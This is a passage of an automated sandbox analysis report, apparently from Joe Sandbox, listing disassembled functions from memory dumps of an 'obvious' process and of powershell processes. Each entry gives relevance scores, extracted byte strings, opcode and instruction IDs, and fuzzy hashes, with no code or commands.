                              • Instruction Fuzzy Hash: 365158A1E0E7CA4FF3798B7445625E93B90EF92390F0606BEE48D875F7EE2452168341
                              Function 00007FFD9BAD68D6 Relevance: 17.8, Strings: 14, Instructions: 283COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: :"q$(:"q$(c"q$0:"q$8:"q$@:"q$H:"q$P:"q$X:"q$`:"q$h:"q$p:"q$9"q$9"q
                              • API String ID: 0-3230101368
                              • Opcode ID: 5a47255b64aecb7284419e01d9446c3af85d1197c4798c7550d3ed2c06cadba5
                              • Instruction ID: 103fea3a017273cbcf9a45b2b0c2608a59a98396244bcdb2c0be5c2d30070b2c
                              • Opcode Fuzzy Hash: 5a47255b64aecb7284419e01d9446c3af85d1197c4798c7550d3ed2c06cadba5
                              • Instruction Fuzzy Hash: 52B1A13060DA9AAFC729D7B05C13AC9BEE0BF06356F254BF9E0469F0E3C5A80885C711
                              Function 00007FFD9BAD63F8 Relevance: 16.6, Strings: 13, Instructions: 369COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 9"q$(9"q$09"q$89"q$@9"q$H9"q$P8"q$P9"q$h8"q$p8"q$x8"q$8"q$8"q
                              • API String ID: 0-2555976747
                              • Opcode ID: f8d5c77ab2c103be1f13593d2d2f933e4a2efde62393642fcc3ccfef705e3b35
                              • Instruction ID: d7ec57cbf75dc555a0619c9cebc1efec40a713291a8dcd640c201cfaea3eef64
                              • Opcode Fuzzy Hash: f8d5c77ab2c103be1f13593d2d2f933e4a2efde62393642fcc3ccfef705e3b35
                              • Instruction Fuzzy Hash: 59C1C460A0FA9E6FC76A97B908678CD7FE09F1636172607EEE0459F0A3D8CC4906C711
                              Function 00007FFD9BAD69F1 Relevance: 15.2, Strings: 12, Instructions: 187COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: :"q$(:"q$(c"q$0:"q$8:"q$@:"q$H:"q$P:"q$X:"q$`:"q$h:"q$p:"q
                              • API String ID: 0-1764029368
                              • Opcode ID: f9ccbb962643323b9f78320defd71b79f6ac58e0a27e70a4c1bc611670794b86
                              • Instruction ID: adcdfd4f1aeca386f0c9ef35023d5b9b647fa2b86461e9070aa291572540d5b9
                              • Opcode Fuzzy Hash: f9ccbb962643323b9f78320defd71b79f6ac58e0a27e70a4c1bc611670794b86
                              • Instruction Fuzzy Hash: 6161813061DA9A9FC729D7B55C13AC9BAE0BF05366F254BF9E0469F0E3C5980886C711
                              Function 00007FFD9BAD646A Relevance: 12.9, Strings: 10, Instructions: 353COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 9"q$(9"q$09"q$89"q$@9"q$H9"q$P8"q$P9"q$8"q$8"q
                              • API String ID: 0-1225446884
                              • Opcode ID: 916c1de00ae7690e855c42519829bdecc1739488e915c3ac3fe51fb9dd0fd8b2
                              • Instruction ID: 91d775db718e304d6e5970dafc9799f7efa10f36da2ff3a270f5c0ef74647204
                              • Opcode Fuzzy Hash: 916c1de00ae7690e855c42519829bdecc1739488e915c3ac3fe51fb9dd0fd8b2
                              • Instruction Fuzzy Hash: 1BC1E560A0FBCEAFC76693B904669CA7FE09F1736572607EEE0459F0A3D89D4906C311
                              Function 00007FFD9BAD67BB Relevance: 11.5, Strings: 9, Instructions: 295COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: c"q$P9"q$X9"q$`9"q$h9"q$p9"q$x9"q$9"q$9"q
                              • API String ID: 0-335902523
                              • Opcode ID: 9a083ed6f5cf87399d1a487b6874de551eae7f4b38b3e4c0bc09cb301cdd4a2b
                              • Instruction ID: dc3cadd9a9d2084cce17527ed4c95e66a936e49bb3fdaad3db270e85982e2165
                              • Opcode Fuzzy Hash: 9a083ed6f5cf87399d1a487b6874de551eae7f4b38b3e4c0bc09cb301cdd4a2b
                              • Instruction Fuzzy Hash: 54B1A82060E6DE9FC72A97B448239C9BFE0AF0B356B260BFAD0459F0E3D99C1945C711
                              Function 00007FFD9BAD9600 Relevance: 10.4, Strings: 8, Instructions: 387COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ["q$ ["q$ ["q$ ["q$ ["q$ ["q$ ["q$["q/
                              • API String ID: 0-1954448781
                              • Opcode ID: cb4006b6d8caaa48a62d77804c038256d3c5b1cbf664a9a0fbb33fbcb1da6a8f
                              • Instruction ID: fee74ab5d8a5716f5605573ceebff897dbee85377d497bdd2681745f4491ea50
                              • Opcode Fuzzy Hash: cb4006b6d8caaa48a62d77804c038256d3c5b1cbf664a9a0fbb33fbcb1da6a8f
                              • Instruction Fuzzy Hash: 02D13B61A0FACA4FD7A5977848292D97FE1FF96264B0945FED085CB0EBE9685C06C300
                              Function 00007FFD9BAD6780 Relevance: 9.0, Strings: 7, Instructions: 239COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: c"q$`9"q$h9"q$p9"q$x9"q$9"q$9"q
                              • API String ID: 0-3311819698
                              • Opcode ID: 43c049e2b86961d4c1e6a75082129161a6c29d33aad7f7c179d0e0af7f7e9c23
                              • Instruction ID: 212cd969c23e44e92cd412a6819e9554a3dfb626d5523e56f60aa0025b6253b2
                              • Opcode Fuzzy Hash: 43c049e2b86961d4c1e6a75082129161a6c29d33aad7f7c179d0e0af7f7e9c23
                              • Instruction Fuzzy Hash: 8081792060EA9AAFC76AD7B548239CDBFE0AF06356B250BFAD0459F0E3D99C0845C711
                              Function 00007FFD9BAD25A8 Relevance: 8.9, Strings: 7, Instructions: 174COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0c"q$Hc"q$KDBM$Pc"q$Xc"q$`c"q$hc"q
                              • API String ID: 0-3044960168
                              • Opcode ID: 99e766c15bf60bb20389b6250cb1a959d2e9c45e15bcb75ada82311975621cb8
                              • Instruction ID: 47d2ad56dc5acb63f5ac18dff1e51064267586bdfea8141f42055b588de394ed
                              • Opcode Fuzzy Hash: 99e766c15bf60bb20389b6250cb1a959d2e9c45e15bcb75ada82311975621cb8
                              • Instruction Fuzzy Hash: AC51597264F7CA4FD3238FF484A50E57BE0FF9632071945EAC4848B1A6E6AD5D86C710
                              Function 00007FFD9BAD8658 Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: K_^$K_^$K_^$K_^$K_^
                              • API String ID: 0-1778473158
                              • Opcode ID: 92517878f553930e111ffb8e52839c7f135ac55b726c345386758a7402fb08db
                              • Instruction ID: 7dc50d2cd11c1ba00642c6cd66931f7f80e81bcf83e9f98ee32546992e763e5a
                              • Opcode Fuzzy Hash: 92517878f553930e111ffb8e52839c7f135ac55b726c345386758a7402fb08db
                              • Instruction Fuzzy Hash: 0931F8F3E1A98E0BEBA50B5D5C6A0E43BD0FF60A7C74603B6E4A89B063FD1536074141
                              Function 00007FFD9BAD8AFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: K_^4$K_^5$K_^6$K_^?$K_^@
                              • API String ID: 0-538154125
                              • Opcode ID: 3fecba1278ac18b4fd634e32b38daf05b4fa41303905216f4c26a3e350bc6b3b
                              • Instruction ID: da6ece5a52ff15f5fc49a7bda636406cfe17c1f8849f92d54d4eeefa0cb82b70
                              • Opcode Fuzzy Hash: 3fecba1278ac18b4fd634e32b38daf05b4fa41303905216f4c26a3e350bc6b3b
                              • Instruction Fuzzy Hash: B321E077B085155E9B16BABCB8614E837A0DFA823F74843FBE4E9CE083DD15208786C4
                              Function 00007FFD9BAD86F8 Relevance: 5.1, Strings: 4, Instructions: 92COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: K_^$K_^$K_^$K_^
                              • API String ID: 0-1134090584
                              • Opcode ID: 2db6372ef0f02313d3e8b8b4f9791d5a80a7a2bbc84c1213879cd16c4f4cf8e7
                              • Instruction ID: bcdcf9808a855c4773d793ef041c3fd1187abb70fade43bac00039883c3edd4e
                              • Opcode Fuzzy Hash: 2db6372ef0f02313d3e8b8b4f9791d5a80a7a2bbc84c1213879cd16c4f4cf8e7
                              • Instruction Fuzzy Hash: AF21A6B3E0B5C91BEB659B5D68660E43B90FFA067D74903B7D4A88F053FD1436068245
                              Function 00007FFD9BAD0758 Relevance: 5.0, Strings: 4, Instructions: 17COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: L_^0$L_^2$L_^4$L_^6
                              • API String ID: 0-2047270763
                              • Opcode ID: 7ff69ff954960246898db6f8392c9e3b0656f18a0b5d234f444cade3e08a98e0
                              • Instruction ID: 640f8808f629fc634a840e1970b03facccb8cf81b8fb259eea73db9485eaf118
                              • Opcode Fuzzy Hash: 7ff69ff954960246898db6f8392c9e3b0656f18a0b5d234f444cade3e08a98e0
                              • Instruction Fuzzy Hash: 0AD012FE9100280DD6021CA618E04EC1B84860137DB203AA3D777D9103CB51D2C3D040
                              Function 00007FFD9BAD0728 Relevance: 5.0, Strings: 4, Instructions: 3COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: L_^0$L_^2$L_^4$L_^6
                              • API String ID: 0-2047270763
                              • Opcode ID: d90a10634a7569a9da6b03dbebb3bb10331e8b5eb83a67a642f421c0b94b6a51
                              • Instruction ID: 0d2443713a10b4496ce575e03b45355f8bd582c3017793c7b3a204bdf04c8cff
                              • Opcode Fuzzy Hash: d90a10634a7569a9da6b03dbebb3bb10331e8b5eb83a67a642f421c0b94b6a51
                              • Instruction Fuzzy Hash: A4900202518092009315A56824614E45B114E1A13F60846E2E4D90C087680520858144

                              Executed Functions

                              Function 00007FFD9BAA3428 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1777395641.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd9baa0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: /G^
                              • API String ID: 0-4060741715
                              • Opcode ID: ff0065ba0ae784c002951ab2acc0aa35ad142a221c2a517443f910198f2fd282
                              • Instruction ID: 1b855302abaf3841eedffb486e875a20bb4e66e1d208004a4fbe415da01a8892
                              • Opcode Fuzzy Hash: ff0065ba0ae784c002951ab2acc0aa35ad142a221c2a517443f910198f2fd282
                              • Instruction Fuzzy Hash: E931AE32A0F7D20FE3674BBDA8660A43FE5EF1363070A01FBC0C58A0A3E44A19468371
                              Function 00007FFD9BAA9748 Relevance: .1, Instructions: 142COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.1777395641.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd9baa0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d1315cf84c9204ac922202315866a6bcc049e55ca8b2d5976bd4ad606e936512
                              • Instruction ID: efa55c218aec9ec6ec15af0ee09fa6ae4cca256525d70eec4e3bced61f08e149
                              • Opcode Fuzzy Hash: d1315cf84c9204ac922202315866a6bcc049e55ca8b2d5976bd4ad606e936512
                              • Instruction Fuzzy Hash: A6415D31A0DB884FDB18DF5C985A6B8BBE1FB55310F00416FE44983292DB70B951C7D2
                              Function 00007FFD9B98E380 Relevance: .1, Instructions: 125COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.1777005943.00007FFD9B98D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B98D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd9b98d000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3796744b55e6d8a2ecf154d20b020f15c76203ccf9f9cd07fdaad43e1c2c6fdf
                              • Instruction ID: 7441f383d28bec7f8d1e84e8a7902733bd10efeaae2b8b0d6c9672625cc91d77
                              • Opcode Fuzzy Hash: 3796744b55e6d8a2ecf154d20b020f15c76203ccf9f9cd07fdaad43e1c2c6fdf
                              • Instruction Fuzzy Hash: EC41157190EFC85FE766CB3998659523FB0EF52310B1605EFD088CB1A3D625A846C792
                              Function 00007FFD9BAA33B5 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.1777395641.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd9baa0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                              • Instruction ID: fe27c77d210453ff9ac8e18656f571fdffb2d1ba2cecbf8df11bf048f1b1a8d7
                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                              • Instruction Fuzzy Hash: 5B01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5DA36E882CB45